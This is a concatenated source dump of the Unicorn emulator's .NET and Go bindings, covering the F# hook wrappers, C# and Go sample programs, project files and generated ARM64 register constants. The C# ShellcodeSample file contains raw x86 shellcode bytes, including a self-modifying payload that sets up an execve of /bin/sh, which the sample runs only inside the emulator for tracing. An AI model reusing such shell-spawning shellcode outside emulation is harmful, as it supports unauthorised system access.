MemWriteHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memWriteHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, Common.UC_HOOK_MEM_WRITE, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memWriteHooks.Add(callback, (hh, userData, memWriteHookInternal)) member this.HookDel(callback: MemWriteHook) = hookDel _memWriteHooks callback member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (eventType: Int32) (addr: Int64) (size: Int32) (value: Int64) (user: IntPtr) = callback.Invoke(this, eventType, addr, size, value, userData) // register the event if not already done _memEventHooks.Keys |> Seq.filter(fun eventFlag -> (eventType &&& eventFlag) <> 0) |> Seq.iter(fun eventFlag -> let memEventHookInternal = new EventMemHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(memEventHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddNoarg(_eng.[0], hh, eventFlag, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _memEventHooks.[eventFlag].Add((callback, (hh, userData, memEventHookInternal))) ) member this.AddEventMemHook(callback: EventMemHook, eventType: Int32, userData: Object) = this.AddEventMemHook(callback, eventType, userData, 1, 0) member this.AddEventMemHook(callback: EventMemHook, eventType: Int32) = this.AddEventMemHook(callback, eventType, null) member this.HookDel(callback: EventMemHook) = _memEventHooks.Keys |> Seq.iter(fun eventFlag -> hookDel _memEventHooks.[eventFlag] callback) member this.AddInHook(callback: InHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (port: Int32) (size: Int32) (user: IntPtr) = callback.Invoke(this, port, size, userData) let inHookInternal = new InHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(inHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, X86.UC_X86_INS_IN) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _inHooks.Add(callback, (hh, userData, inHookInternal)) member this.AddInHook(callback: InHook, userData: Object) = this.AddInHook(callback, userData, 1, 0) member this.AddInHook(callback: InHook) = this.AddInHook(callback, null) member this.HookDel(callback: InHook) = hookDel _inHooks callback member this.AddOutHook(callback: OutHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (port: Int32) (size: Int32) (value: Int32) (user: IntPtr) = callback.Invoke(this, port, size, value, userData) let outHookInternal = new OutHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(outHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, X86.UC_X86_INS_OUT) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _outHooks.Add(callback, (hh, userData, outHookInternal)) member this.AddOutHook(callback: OutHook, userData: Object) = this.AddOutHook(callback, userData, 1, 0) member this.AddOutHook(callback: OutHook) = this.AddOutHook(callback, null) member this.HookDel(callback: OutHook) = hookDel _outHooks callback member this.AddSyscallHook(callback: SyscallHook, userData: Object, beginAddr: Int64, endAddr: Int64) = let trampoline(u: IntPtr) (user: IntPtr) = callback.Invoke(this, userData) let syscallHookInternal = new SyscallHookInternal(trampoline) let funcPointer = Marshal.GetFunctionPointerForDelegate(syscallHookInternal) let hh = new UIntPtr(allocate(IntPtr.Size)) match binding.HookAddArg0(_eng.[0], hh, Common.UC_HOOK_INSN, new UIntPtr(funcPointer.ToPointer()), IntPtr.Zero, uint64 beginAddr, uint64 endAddr, X86.UC_X86_INS_SYSCALL) |> checkResult with | Some e -> raise e | None -> () let hh = (unativeint)(Marshal.ReadIntPtr((nativeint)hh)) _syscallHooks.Add(callback, (hh, userData, syscallHookInternal)) member this.AddSyscallHook(callback: SyscallHook, userData: Object) = this.AddSyscallHook(callback, userData, 1, 0) member this.AddSyscallHook(callback: SyscallHook) = this.AddSyscallHook(callback, null) member this.HookDel(callback: SyscallHook) = hookDel _syscallHooks callback member this.Version() = let (major, minor) = (new UIntPtr(), new UIntPtr()) let combined = binding.Version(major, minor) (major.ToUInt32(), minor.ToUInt32(), combined) abstract Dispose : Boolean -> unit default this.Dispose(disposing: Boolean) = if (disposing) then // free managed resources, this is the default dispose implementation pattern () _disposablePointers |> Seq.filter(fun pointer -> pointer <> IntPtr.Zero) |> Seq.iter Marshal.FreeHGlobal _disposablePointers.Clear() member this.Dispose() = this.Dispose(true) GC.SuppressFinalize(this) override this.Finalize() = this.Dispose(false) interface IDisposable with member this.Dispose() = this.Dispose() unicorn-2.1.1/bindings/dotnet/UnicornEngine/UnicornEngine.fsproj000066400000000000000000000035121467524106700250320ustar00rootroot00000000000000 net6.0 UnicornEngine.Unicorn UnicornEngine Copyright © Antonio Parata 2016 https://github.com/unicorn-engine/unicorn .NET bindings for unicorn 2.1.1 $(VersionSuffix) 0c21f1c1-2725-4a46-9022-1905f85822a5 true true 3 none unicorn-2.1.1/bindings/dotnet/UnicornEngine/UnicornEngineException.fs000066400000000000000000000002521467524106700260140ustar00rootroot00000000000000namespace UnicornEngine open System type UnicornEngineException(errNo: Int32, msg: String) = inherit ApplicationException(msg) member this.ErrorNo = errNo unicorn-2.1.1/bindings/dotnet/UnicornSamples/000077500000000000000000000000001467524106700212405ustar00rootroot00000000000000unicorn-2.1.1/bindings/dotnet/UnicornSamples/Program.cs000066400000000000000000000011211467524106700231710ustar00rootroot00000000000000using System; namespace UnicornSamples { internal static class Program { private static void Main(string[] args) { // X86 tests 32bit X86Sample32.X86Code32(); X86Sample32.X86Code32InvalidMemRead(); X86Sample32.X86Code32InvalidMemWriteWithRuntimeFix(); X86Sample32.X86Code32InOut(); // Run all shellcode tests ShellcodeSample.X86Code32Self(); ShellcodeSample.X86Code32(); Console.Write("Tests completed"); Console.ReadLine(); } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/ShellcodeSample.cs000066400000000000000000000145041467524106700246370ustar00rootroot00000000000000using Gee.External.Capstone; using Gee.External.Capstone.X86; using System; using System.Diagnostics; using System.Text; using UnicornEngine; using UnicornEngine.Const; namespace UnicornSamples { internal static class ShellcodeSample { private const long ADDRESS = 0x1000000; public static void X86Code32Self() { byte[] X86_CODE32_SELF = { 0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 }; Run(X86_CODE32_SELF); } public static void X86Code32() { byte[] X86_CODE32 = { 0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, 0x6f }; Run(X86_CODE32); } private static void Run(byte[] code) { Console.WriteLine(); var stackTrace = new StackTrace(); var stackFrame = stackTrace.GetFrames()[1]; var methodName = stackFrame.GetMethod().Name; Console.WriteLine($"*** Start: {methodName}"); RunTest(code, ADDRESS); Console.WriteLine($"*** End: {methodName}"); Console.WriteLine(); } private static void RunTest(byte[] code, long address) { try { using (var u = new Unicorn(Common.UC_ARCH_X86, Common.UC_MODE_32)) using(var disassembler = CapstoneDisassembler.CreateX86Disassembler(X86DisassembleMode.Bit32)) { Console.WriteLine($"Unicorn version: {u.Version()}"); // map 2MB of memory for this emulation u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); // write machine code to be emulated to memory u.MemWrite(address, code); // initialize machine registers u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); var regv = new byte[4]; u.RegRead(X86.UC_X86_REG_ESP, regv); // tracing all instructions by having @begin > @end u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); // handle interrupt ourself u.AddInterruptHook(InterruptHookCallback); // handle SYSCALL u.AddSyscallHook(SyscallHookCallback); Console.WriteLine(">>> Start tracing code"); // emulate machine code in infinite time u.EmuStart(address, address + code.Length, 0u, 0u); Console.WriteLine(">>> Emulation Done!"); } } catch (UnicornEngineException ex) { Console.Error.WriteLine("Emulation FAILED! " + ex.Message); } } private static void CodeHookCallback( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void SyscallHookCallback(Unicorn u, object userData) { var eaxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); var eax = Utils.ToInt(eaxBuffer); Console.WriteLine($"[!] Syscall EAX = 0x{eax:X}"); u.EmuStop(); } private static void InterruptHookCallback(Unicorn u, int intNumber, object userData) { // only handle Linux syscall if (intNumber != 0x80) { return; } var eaxBuffer = new byte[4]; var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var eax = Utils.ToInt(eaxBuffer); var eip = Utils.ToInt(eipBuffer); switch (eax) { default: Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, EAX=0x{eax:X}"); break; case 1: // sys_exit Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, SYS_EXIT"); u.EmuStop(); break; case 4: // sys_write // ECX = buffer address var ecxBuffer = new byte[4]; // EDX = buffer size var edxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); var ecx = Utils.ToInt(ecxBuffer); var edx = Utils.ToInt(edxBuffer); // read the buffer in var size = Math.Min(256, edx); var buffer = new byte[size]; u.MemRead(ecx, buffer); var content = Encoding.Default.GetString(buffer); Console.WriteLine($"[!] Interrupt 0x{eip:X}: num {ecx:X}, SYS_WRITE. buffer = 0x{edx:X}, size = {size:X}, content = '{content}'"); break; } } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/UnicornSamples.csproj000066400000000000000000000017601467524106700254300ustar00rootroot00000000000000 net6.0 Exe UnicornSamples UnicornSamples Copyright © Antonio Parata 2016 https://github.com/unicorn-engine/unicorn 2.1.1 {B80B5987-1E24-4309-8BF9-C4F91270F21C} true prompt 4 {0c21f1c1-2725-4a46-9022-1905f85822a5} UnicornEngine unicorn-2.1.1/bindings/dotnet/UnicornSamples/Utils.cs000066400000000000000000000022611467524106700226700ustar00rootroot00000000000000using Gee.External.Capstone.X86; using System; using System.Text; namespace UnicornSamples { internal static class Utils { public static long ToInt(byte[] val) { ulong res = 0; for (var i = 0; i < val.Length; i++) { var v = val[i] & 0xFF; res += (ulong)(v << (i * 8)); } return (long)res; } public static byte[] Int64ToBytes(long intVal) { var res = new byte[8]; var uval = (ulong)intVal; for (var i = 0; i < res.Length; i++) { res[i] = (byte)(uval & 0xff); uval = uval >> 8; } return res; } public static string Disassemble(CapstoneX86Disassembler disassembler, byte[] code) { var sb = new StringBuilder(); var instructions = disassembler.Disassemble(code); foreach (var instruction in instructions) { sb.AppendFormat($"{instruction.Mnemonic} {instruction.Operand}{Environment.NewLine}"); } return sb.ToString().Trim(); } } } unicorn-2.1.1/bindings/dotnet/UnicornSamples/X86Sample32.cs000066400000000000000000000241261467524106700234700ustar00rootroot00000000000000using Gee.External.Capstone; using Gee.External.Capstone.X86; using System; using System.Diagnostics; using System.Text; using UnicornEngine; using UnicornEngine.Const; namespace UnicornSamples { internal static class X86Sample32 { private const long ADDRESS = 0x1000000; public static void X86Code32() { byte[] X86_CODE32 = { // INC ecx; DEC edx 0x41, 0x4a }; Run(X86_CODE32); } public static void X86Code32InvalidMemRead() { byte[] X86_CODE32_MEM_READ = { // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx 0x8B, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a }; Run(X86_CODE32_MEM_READ); } public static void X86Code32InvalidMemWriteWithRuntimeFix() { byte[] X86_CODE32_MEM_WRITE = { // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx 0x89, 0x0D, 0xAA, 0xAA, 0xAA, 0xAA, 0x41, 0x4a }; Run(X86_CODE32_MEM_WRITE); } public static void X86Code32InOut() { byte[] X86_CODE32_INOUT = { // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx 0x41, 0xE4, 0x3F, 0x4a, 0xE6, 0x46, 0x43 }; Run(X86_CODE32_INOUT); } private static void Run(byte[] code, bool raiseException = false) { Console.WriteLine(); var stackTrace = new StackTrace(); var stackFrame = stackTrace.GetFrames()[1]; var methodName = stackFrame.GetMethod()?.Name; Console.WriteLine($"*** Start: {methodName}"); Exception e = null; try { RunTest(code, ADDRESS, Common.UC_MODE_32); } catch (UnicornEngineException ex) { e = ex; } if (!raiseException && e != null) { Console.Error.WriteLine("Emulation FAILED! " + e.Message); } Console.WriteLine("*** End: " + methodName); Console.WriteLine(); } private static void RunTest(byte[] code, long address, int mode) { using var u = new Unicorn(Common.UC_ARCH_X86, mode); using var disassembler = CapstoneDisassembler.CreateX86Disassembler(X86DisassembleMode.Bit32); Console.WriteLine($"Unicorn version: {u.Version()}"); // map 2MB of memory for this emulation u.MemMap(address, 2 * 1024 * 1024, Common.UC_PROT_ALL); // initialize machine registers u.RegWrite(X86.UC_X86_REG_EAX, 0x1234); u.RegWrite(X86.UC_X86_REG_ECX, 0x1234); u.RegWrite(X86.UC_X86_REG_EDX, 0x7890); // write machine code to be emulated to memory u.MemWrite(address, code); // initialize machine registers u.RegWrite(X86.UC_X86_REG_ESP, Utils.Int64ToBytes(address + 0x200000)); // handle IN & OUT instruction u.AddInHook(InHookCallback); u.AddOutHook(OutHookCallback); // tracing all instructions by having @begin > @end u.AddCodeHook((uc, addr, size, userData) => CodeHookCallback(disassembler, uc, addr, size, userData), 1, 0); // handle interrupt ourself u.AddInterruptHook(InterruptHookCallback); // handle SYSCALL u.AddSyscallHook(SyscallHookCallback); // intercept invalid memory events u.AddEventMemHook(MemMapHookCallback, Common.UC_HOOK_MEM_READ_UNMAPPED | Common.UC_HOOK_MEM_WRITE_UNMAPPED); Console.WriteLine(">>> Start tracing code"); // emulate machine code in infinite time u.EmuStart(address, address + code.Length, 0u, 0u); // print registers var ecx = u.RegRead(X86.UC_X86_REG_ECX); var edx = u.RegRead(X86.UC_X86_REG_EDX); var eax = u.RegRead(X86.UC_X86_REG_EAX); Console.WriteLine($"[!] EAX = {eax:X}"); Console.WriteLine($"[!] ECX = {ecx:X}"); Console.WriteLine($"[!] EDX = {edx:X}"); Console.WriteLine(">>> Emulation Done!"); } private static int InHookCallback(Unicorn u, int port, int size, object userData) { var eip = u.RegRead(X86.UC_X86_REG_EIP); Console.WriteLine($"[!] Reading from port 0x{port:X}, size: {size:X}, address: 0x{eip:X}"); var res = size switch { 1 => // read 1 byte to AL 0xf1, 2 => // read 2 byte to AX 0xf2, 4 => // read 4 byte to EAX 0xf4, _ => 0 }; Console.WriteLine($"[!] Return value: {res:X}"); return res; } private static void OutHookCallback(Unicorn u, int port, int size, int value, object userData) { var eip = u.RegRead(X86.UC_X86_REG_EIP); Console.WriteLine($"[!] Writing to port 0x{port:X}, size: {size:X}, value: 0x{value:X}, address: 0x{eip:X}"); // confirm that value is indeed the value of AL/ AX / EAX var v = 0L; var regName = string.Empty; switch (size) { case 1: // read 1 byte in AL v = u.RegRead(X86.UC_X86_REG_AL); regName = "AL"; break; case 2: // read 2 byte in AX v = u.RegRead(X86.UC_X86_REG_AX); regName = "AX"; break; case 4: // read 4 byte in EAX v = u.RegRead(X86.UC_X86_REG_EAX); regName = "EAX"; break; } Console.WriteLine("[!] Register {0}: {1:X}", regName, v); } private static bool MemMapHookCallback(Unicorn u, int eventType, long address, int size, long value, object userData) { if (eventType != Common.UC_MEM_WRITE_UNMAPPED) return false; Console.WriteLine($"[!] Missing memory is being WRITE at 0x{address:X}, data size = {size:X}, data value = 0x{value:X}. Map memory."); u.MemMap(0xaaaa0000, 2 * 1024 * 1024, Common.UC_PROT_ALL); return true; } private static void CodeHookCallback1( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void CodeHookCallback( CapstoneX86Disassembler disassembler, Unicorn u, long addr, int size, object userData) { Console.Write($"[+] 0x{addr:X}: "); var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var effectiveSize = Math.Min(16, size); var tmp = new byte[effectiveSize]; u.MemRead(addr, tmp); var sb = new StringBuilder(); foreach (var t in tmp) { sb.AppendFormat($"{(0xFF & t):X} "); } Console.Write($"{sb,-20}"); Console.WriteLine(Utils.Disassemble(disassembler, tmp)); } private static void SyscallHookCallback(Unicorn u, object userData) { var eaxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); var eax = Utils.ToInt(eaxBuffer); Console.WriteLine($"[!] Syscall EAX = 0x{eax:X}"); u.EmuStop(); } private static void InterruptHookCallback(Unicorn u, int intNumber, object userData) { // only handle Linux syscall if (intNumber != 0x80) { return; } var eaxBuffer = new byte[4]; var eipBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_EAX, eaxBuffer); u.RegRead(X86.UC_X86_REG_EIP, eipBuffer); var eax = Utils.ToInt(eaxBuffer); var eip = Utils.ToInt(eipBuffer); switch (eax) { default: Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, EAX=0x{eax:X}"); break; case 1: // sys_exit Console.WriteLine($"[!] Interrupt 0x{eip:X} num {intNumber:X}, SYS_EXIT"); u.EmuStop(); break; case 4: // sys_write // ECX = buffer address var ecxBuffer = new byte[4]; // EDX = buffer size var edxBuffer = new byte[4]; u.RegRead(X86.UC_X86_REG_ECX, ecxBuffer); u.RegRead(X86.UC_X86_REG_EDX, edxBuffer); var ecx = Utils.ToInt(ecxBuffer); var edx = Utils.ToInt(edxBuffer); // read the buffer in var size = Math.Min(256, edx); var buffer = new byte[size]; u.MemRead(ecx, buffer); var content = Encoding.Default.GetString(buffer); Console.WriteLine($"[!] Interrupt 0x{eip:X}: num {ecx:X}, SYS_WRITE. buffer = 0x{edx:X}, size = {size:X}, content = '{content}'"); break; } } } } unicorn-2.1.1/bindings/go/000077500000000000000000000000001467524106700154065ustar00rootroot00000000000000unicorn-2.1.1/bindings/go/Makefile000066400000000000000000000004251467524106700170470ustar00rootroot00000000000000# Go binding for Unicorn engine. Ryan Hileman .PHONY: all gen_const test all: gen_const cd unicorn && go build gen_const: cd .. && python3 const_generator.py go test: all cd unicorn && LD_LIBRARY_PATH=../../../ DYLD_LIBRARY_PATH=../../../ go test unicorn-2.1.1/bindings/go/README.md000066400000000000000000000015611467524106700166700ustar00rootroot00000000000000To download/update the Unicorn Go bindings, run: go get -u github.com/unicorn-engine/unicorn/bindings/go A very basic usage example follows _(Does not handle most errors for brevity. Please see sample.go for a more hygenic example):_ package main import ( "fmt" uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" ) func main() { mu, _ := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_32) // mov eax, 1234 code := []byte{184, 210, 4, 0, 0} mu.MemMap(0x1000, 0x1000) mu.MemWrite(0x1000, code) if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { panic(err) } eax, _ := mu.RegRead(uc.X86_REG_EAX) fmt.Printf("EAX is now: %d\n", eax) } An example program exercising far more Unicorn functionality and error handling can be found in sample.go. unicorn-2.1.1/bindings/go/sample.go000066400000000000000000000052171467524106700172230ustar00rootroot00000000000000package main import ( "encoding/hex" "fmt" uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" "strings" ) var asm = strings.Join([]string{ "48c7c003000000", // mov rax, 3 "0f05", // syscall "48c7c700400000", // mov rdi, 0x4000 "488907", // mov [rdi], rdx "488b07", // mov rdx, [rdi] "4883c201", // add rdx, 1 }, "") func addHooks(mu uc.Unicorn) { mu.HookAdd(uc.HOOK_BLOCK, func(mu uc.Unicorn, addr uint64, size uint32) { fmt.Printf("Block: 0x%x, 0x%x\n", addr, size) }, 1, 0) mu.HookAdd(uc.HOOK_CODE, func(mu uc.Unicorn, addr uint64, size uint32) { fmt.Printf("Code: 0x%x, 0x%x\n", addr, size) }, 1, 0) mu.HookAdd(uc.HOOK_MEM_READ|uc.HOOK_MEM_WRITE, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) { if access == uc.MEM_WRITE { fmt.Printf("Mem write") } else { fmt.Printf("Mem read") } fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) }, 1, 0) invalid := uc.HOOK_MEM_READ_INVALID | uc.HOOK_MEM_WRITE_INVALID | uc.HOOK_MEM_FETCH_INVALID mu.HookAdd(invalid, func(mu uc.Unicorn, access int, addr uint64, size int, value int64) bool { switch access { case uc.MEM_WRITE_UNMAPPED | uc.MEM_WRITE_PROT: fmt.Printf("invalid write") case uc.MEM_READ_UNMAPPED | uc.MEM_READ_PROT: fmt.Printf("invalid read") case uc.MEM_FETCH_UNMAPPED | uc.MEM_FETCH_PROT: fmt.Printf("invalid fetch") default: fmt.Printf("unknown memory error") } fmt.Printf(": @0x%x, 0x%x = 0x%x\n", addr, size, value) return false }, 1, 0) mu.HookAdd(uc.HOOK_INSN, func(mu uc.Unicorn) { rax, _ := mu.RegRead(uc.X86_REG_RAX) fmt.Printf("Syscall: %d\n", rax) }, 1, 0, uc.X86_INS_SYSCALL) } func run() error { code, err := hex.DecodeString(asm) if err != nil { return err } // set up unicorn instance and add hooks mu, err := uc.NewUnicorn(uc.ARCH_X86, uc.MODE_64) if err != nil { return err } addHooks(mu) // map and write code to memory if err := mu.MemMap(0x1000, 0x1000); err != nil { return err } if err := mu.MemWrite(0x1000, code); err != nil { return err } // map scratch space if err := mu.MemMap(0x4000, 0x1000); err != nil { return err } // set example register if err := mu.RegWrite(uc.X86_REG_RDX, 1); err != nil { return err } rdx, err := mu.RegRead(uc.X86_REG_RDX) if err != nil { return err } fmt.Printf("RDX is: %d\n", rdx) // start emulation if err := mu.Start(0x1000, 0x1000+uint64(len(code))); err != nil { return err } // read back example register rdx, err = mu.RegRead(uc.X86_REG_RDX) if err != nil { return err } fmt.Printf("RDX is now: %d\n", rdx) return nil } func main() { if err := run(); err != nil { fmt.Println(err) } } unicorn-2.1.1/bindings/go/unicorn/000077500000000000000000000000001467524106700170635ustar00rootroot00000000000000unicorn-2.1.1/bindings/go/unicorn/arm64_const.go000066400000000000000000000154561467524106700215640ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.go] const ( // ARM64 CPU CPU_ARM64_A57 = 0 CPU_ARM64_A53 = 1 CPU_ARM64_A72 = 2 CPU_ARM64_MAX = 3 CPU_ARM64_ENDING = 4 // ARM64 registers ARM64_REG_INVALID = 0 ARM64_REG_X29 = 1 ARM64_REG_X30 = 2 ARM64_REG_NZCV = 3 ARM64_REG_SP = 4 ARM64_REG_WSP = 5 ARM64_REG_WZR = 6 ARM64_REG_XZR = 7 ARM64_REG_B0 = 8 ARM64_REG_B1 = 9 ARM64_REG_B2 = 10 ARM64_REG_B3 = 11 ARM64_REG_B4 = 12 ARM64_REG_B5 = 13 ARM64_REG_B6 = 14 ARM64_REG_B7 = 15 ARM64_REG_B8 = 16 ARM64_REG_B9 = 17 ARM64_REG_B10 = 18 ARM64_REG_B11 = 19 ARM64_REG_B12 = 20 ARM64_REG_B13 = 21 ARM64_REG_B14 = 22 ARM64_REG_B15 = 23 ARM64_REG_B16 = 24 ARM64_REG_B17 = 25 ARM64_REG_B18 = 26 ARM64_REG_B19 = 27 ARM64_REG_B20 = 28 ARM64_REG_B21 = 29 ARM64_REG_B22 = 30 ARM64_REG_B23 = 31 ARM64_REG_B24 = 32 ARM64_REG_B25 = 33 ARM64_REG_B26 = 34 ARM64_REG_B27 = 35 ARM64_REG_B28 = 36 ARM64_REG_B29 = 37 ARM64_REG_B30 = 38 ARM64_REG_B31 = 39 ARM64_REG_D0 = 40 ARM64_REG_D1 = 41 ARM64_REG_D2 = 42 ARM64_REG_D3 = 43 ARM64_REG_D4 = 44 ARM64_REG_D5 = 45 ARM64_REG_D6 = 46 ARM64_REG_D7 = 47 ARM64_REG_D8 = 48 ARM64_REG_D9 = 49 ARM64_REG_D10 = 50 ARM64_REG_D11 = 51 ARM64_REG_D12 = 52 ARM64_REG_D13 = 53 ARM64_REG_D14 = 54 ARM64_REG_D15 = 55 ARM64_REG_D16 = 56 ARM64_REG_D17 = 57 ARM64_REG_D18 = 58 ARM64_REG_D19 = 59 ARM64_REG_D20 = 60 ARM64_REG_D21 = 61 ARM64_REG_D22 = 62 ARM64_REG_D23 = 63 ARM64_REG_D24 = 64 ARM64_REG_D25 = 65 ARM64_REG_D26 = 66 ARM64_REG_D27 = 67 ARM64_REG_D28 = 68 ARM64_REG_D29 = 69 ARM64_REG_D30 = 70 ARM64_REG_D31 = 71 ARM64_REG_H0 = 72 ARM64_REG_H1 = 73 ARM64_REG_H2 = 74 ARM64_REG_H3 = 75 ARM64_REG_H4 = 76 ARM64_REG_H5 = 77 ARM64_REG_H6 = 78 ARM64_REG_H7 = 79 ARM64_REG_H8 = 80 ARM64_REG_H9 = 81 ARM64_REG_H10 = 82 ARM64_REG_H11 = 83 ARM64_REG_H12 = 84 ARM64_REG_H13 = 85 ARM64_REG_H14 = 86 ARM64_REG_H15 = 87 ARM64_REG_H16 = 88 ARM64_REG_H17 = 89 ARM64_REG_H18 = 90 ARM64_REG_H19 = 91 ARM64_REG_H20 = 92 ARM64_REG_H21 = 93 ARM64_REG_H22 = 94 ARM64_REG_H23 = 95 ARM64_REG_H24 = 96 ARM64_REG_H25 = 97 ARM64_REG_H26 = 98 ARM64_REG_H27 = 99 ARM64_REG_H28 = 100 ARM64_REG_H29 = 101 ARM64_REG_H30 = 102 ARM64_REG_H31 = 103 ARM64_REG_Q0 = 104 ARM64_REG_Q1 = 105 ARM64_REG_Q2 = 106 ARM64_REG_Q3 = 107 ARM64_REG_Q4 = 108 ARM64_REG_Q5 = 109 ARM64_REG_Q6 = 110 ARM64_REG_Q7 = 111 ARM64_REG_Q8 = 112 ARM64_REG_Q9 = 113 ARM64_REG_Q10 = 114 ARM64_REG_Q11 = 115 ARM64_REG_Q12 = 116 ARM64_REG_Q13 = 117 ARM64_REG_Q14 = 118 ARM64_REG_Q15 = 119 ARM64_REG_Q16 = 120 ARM64_REG_Q17 = 121 ARM64_REG_Q18 = 122 ARM64_REG_Q19 = 123 ARM64_REG_Q20 = 124 ARM64_REG_Q21 = 125 ARM64_REG_Q22 = 126 ARM64_REG_Q23 = 127 ARM64_REG_Q24 = 128 ARM64_REG_Q25 = 129 ARM64_REG_Q26 = 130 ARM64_REG_Q27 = 131 ARM64_REG_Q28 = 132 ARM64_REG_Q29 = 133 ARM64_REG_Q30 = 134 ARM64_REG_Q31 = 135 ARM64_REG_S0 = 136 ARM64_REG_S1 = 137 ARM64_REG_S2 = 138 ARM64_REG_S3 = 139 ARM64_REG_S4 = 140 ARM64_REG_S5 = 141 ARM64_REG_S6 = 142 ARM64_REG_S7 = 143 ARM64_REG_S8 = 144 ARM64_REG_S9 = 145 ARM64_REG_S10 = 146 ARM64_REG_S11 = 147 ARM64_REG_S12 = 148 ARM64_REG_S13 = 149 ARM64_REG_S14 = 150 ARM64_REG_S15 = 151 ARM64_REG_S16 = 152 ARM64_REG_S17 = 153 ARM64_REG_S18 = 154 ARM64_REG_S19 = 155 ARM64_REG_S20 = 156 ARM64_REG_S21 = 157 ARM64_REG_S22 = 158 ARM64_REG_S23 = 159 ARM64_REG_S24 